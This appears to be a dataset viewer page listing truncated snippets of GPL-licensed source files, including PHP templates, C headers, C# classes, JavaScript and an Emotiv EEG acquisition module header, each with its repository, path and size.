<th colspan = "2"> Fill The Form To Edit An Appoindment</th... | Meritei/FINAL-MTRH | Mtrh/app/views/booking/edit.blade.php | PHP | gpl-2.0 | 1,163 |
<HTML>
<!-- Mirrored from www.w3schools.com/asp/showaspcode.asp?source=demo_contentlinking by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:11:38 GMT -->
<HEAD></HEAD>
<FONT FACE="Verdana, Arial, Helvetica" SIZE=2>
<!DOCTYPE html><br><html><br><body><br><br><p><br>The example below builds ... | platinhom/ManualHom | Coding/W3School/W3Schools_Offline_2015/www.w3schools.com/asp/showaspcode4e3e.html | HTML | gpl-2.0 | 1,373 |
tinyMCE.addI18n("ru.len-slider",{
title : "Шорткод для вставки LenSlider"
}); | gritz99/SOAP | wp-content/plugins/len-slider/js/langs/ru.js | JavaScript | gpl-2.0 | 97 |
namespace Api.HelpPage.Areas.HelpPage.ModelDescriptions
{
/// <summary>
///
/// </summary>
public class DictionaryModelDescription : KeyValuePairModelDescription
{
}
} | victorxata/bartrade.rocks | Api.HelpPage/Areas/HelpPage/ModelDescriptions/DictionaryModelDescription.cs | C# | gpl-2.0 | 192 |
<?php
/* * *************************************************************************************************** */
// Generate option tabs content
/* * *************************************************************************************************** */
function nimbus_field_engine() {
global $allowedtags, $NIM... | aliuwahab/saveghana | wp-content/themes/wp-opulus/nimbus/options_engine.php | PHP | gpl-2.0 | 17,082 |
<?php
/**
* @package HikaMarket for Joomla!
* @version 4.0.0
* @author Obsidev S.A.R.L.
* @copyright (C) 2011-2021 OBSIDEV. All rights reserved.
* @license GNU/GPLv3 http://www.gnu.org/licenses/gpl-3.0.html
*/
defined('_JEXEC') or die('Restricted access');
?><?php
class market_order_status_notificat... | emundus/v6 | media/com_hikamarket/mail/order_status_notification.preview.php | PHP | gpl-2.0 | 2,333 |
# -*- coding: utf-8 -*-
"""
Emotiv acquisition :
Reverse engineering and original crack code written by
Cody Brocious (http://github.com/daeken)
Kyle Machulis (http://github.com/qdot)
Many thanks for their contribution.
Need python-crypto.
"""
import multiprocessing as mp
import numpy as np
import msgpack... | Hemisphere-Project/Telemir-DatabitMe | Telemir-EEG/pyacq/pyacq/core/devices/emotiv.py | Python | gpl-2.0 | 12,623 |
// $Id: ahah.js,v 1.1.2.1 2009/03/21 19:43:51 mfer Exp $
/**
* Provides AJAX-like page updating via AHAH (Asynchronous HTML and HTTP).
*
* AHAH is a method of making a request via Javascript while viewing an HTML
* page. The request returns a small chunk of HTML, which is then directly
* injected into the ... | punithagk/mpm | profiles/uberdrupal/modules/jquery_update/replace/ahah.js | JavaScript | gpl-2.0 | 7,824 |
/*
CVSNT Generic API
Copyright (C) 2004 Tony Hoyle and March-Hare Software Ltd
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License version 2.1 as published by the Free Software Foundation.
This library is distributed in ... | yath/cvsnt | cvsapi/FileAccess.h | C | gpl-2.0 | 3,355 |
/*
* OMAP2/3/4 powerdomain control
*
* Copyright (C) 2007-2008, 2010-2012 Texas Instruments, Inc.
* Copyright (C) 2007-2011 Nokia Corporation
*
* Paul Walmsley
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* publish... | Hashcode/kernel_omap | arch/arm/mach-omap2/powerdomain.h | C | gpl-2.0 | 13,306 |
/* Copyright (C) 2008 PrimeBase Technologies GmbH, Germany
*
* PrimeBase Media Stream for MySQL
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at... | miurahr/drizzle | plugin/pbms/src/cslib/CSSocket.h | C | gpl-2.0 | 3,856 |
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
namespace Travelling.Caching
{
public enum CacheOverdueType
{
None = 0,
AbsoluteExpiration=1,
NoSlidingExpiration=2
}
}
| binlyzhuo/travelling | src/Travelling.Caching/CacheOverdueType.cs | C# | gpl-2.0 | 246 |
#ifndef _COMMON_DEFS_
#define _COMMON_DEFS_
enum EOS_TYPE {SRK, VDW, PR, GHC};
enum FLASH_TYPE {SIMPLE };
enum SIM_TYPE {LIQDENSITY, VAPDENSITY, TPFLASH, PT_DIAGRAM, DEW_POINT, BUBBLE_POINT, PUREPSAT};
#endif
| edwardthomas/phase-equilibria-software | PVT_calc/Source/commonDefs.hpp | C++ | gpl-2.0 | 214 |
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Reflection;
namespace SenseNet.ContentRepository.Schema
{
public static class DynamicContentTools
{
public static IDictionary<string, FieldMetadata> GetFieldMetadata(Type type)
{
... | SenseNet/sensenet | src/ContentRepository/Schema/DynamicContentTools.cs | C# | gpl-2.0 | 4,315 |
//-----------------------------------------------------------------------------
// File: DesignInstantiationEditor.h
//-----------------------------------------------------------------------------
// Project: Kactus2
// Author: Esko Pekkarinen
// Date: 26.01.2016
//
// Description:
// Editor for design configur... | kactus2/kactus2dev | editors/ComponentEditor/instantiations/DesignInstantiationEditor.h | C | gpl-2.0 | 3,427 |
<?php
/**
* Helper class for the Constant Contact API.
*
* @since 1.5.4
*/
final class FLBuilderServiceConstantContact extends FLBuilderService {
/**
* The ID for this service.
*
* @since 1.5.4
* @var string $id
*/
public $id = 'constant-contact';
/**
* The api url for this service.
*
* @since... | isabisa/nccdi | wp-content/plugins/bb-plugin/classes/class-fl-builder-service-constant-contact.php | PHP | gpl-2.0 | 9,692 |
<!DOCTYPE html>
<html>
<!-- Mirrored from www.w3schools.com/jquery/tryjquery_event_mup_mdown_ref.htm by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:36:08 GMT -->
<head>
<script src="../../ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script>
<script>
$(document).ready(function(){
$("d... | platinhom/ManualHom | Coding/W3School/W3Schools_Offline_2015/www.w3schools.com/jquery/tryjquery_event_mup_mdown_ref.html | HTML | gpl-2.0 | 819 |
/* Copyright (c) 2013 Dropbox, Inc.
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish,... | aholler/snetmanmon | json11/json11.cpp | C++ | gpl-2.0 | 24,950 |
/*
This file is part of KOrganizer.
Copyright (c) 2008 Thomas Thrainer <tom_t@gmx.at>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option)... | kolab-groupware/kdepim | calendarviews/todo/todoviewview.cpp | C++ | gpl-2.0 | 6,944 |
/*
* variables.h:
* Gtkdialog - A small utility for fast and easy GUI building.
* Copyright (C) 2003-2007 László Pere <pipas@linux.pte.hu>
* Copyright (C) 2011-2012 Thunor <thunorsif@hotmail.com>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General P... | alexis-82/gtkdialog | src/variables.h | C | gpl-2.0 | 3,244 |
<?php
/**
* @package ZOO Component
* @file _menu.php
* @version 2.0.1 May 2010
* @author YOOtheme http://www.yootheme.com
* @copyright Copyright (C) 2007 - 2010 YOOtheme GmbH
* @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 only
*/
// no direct access
defined('_JEXEC') or die('Restricted acc... | alecerosiete/webBancaria | administrator/components/com_zoo/partials/_menu.php | PHP | gpl-2.0 | 2,104 |
#ifndef __rozofs_rcmd_status_e2String_h__
#define __rozofs_rcmd_status_e2String_h__
#ifdef __cplusplus
extern "C" {
#endif /*__cplusplus*/
/*___________________________________________________________________
Generated by enum2String.py
Date : Thursday 2017 July 27, 15:05:56
Command line :
../../tools/en... | rozofs/rozofs | rozofs/core/rozofs_rcmd_status_e2String.h | C | gpl-2.0 | 2,385 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.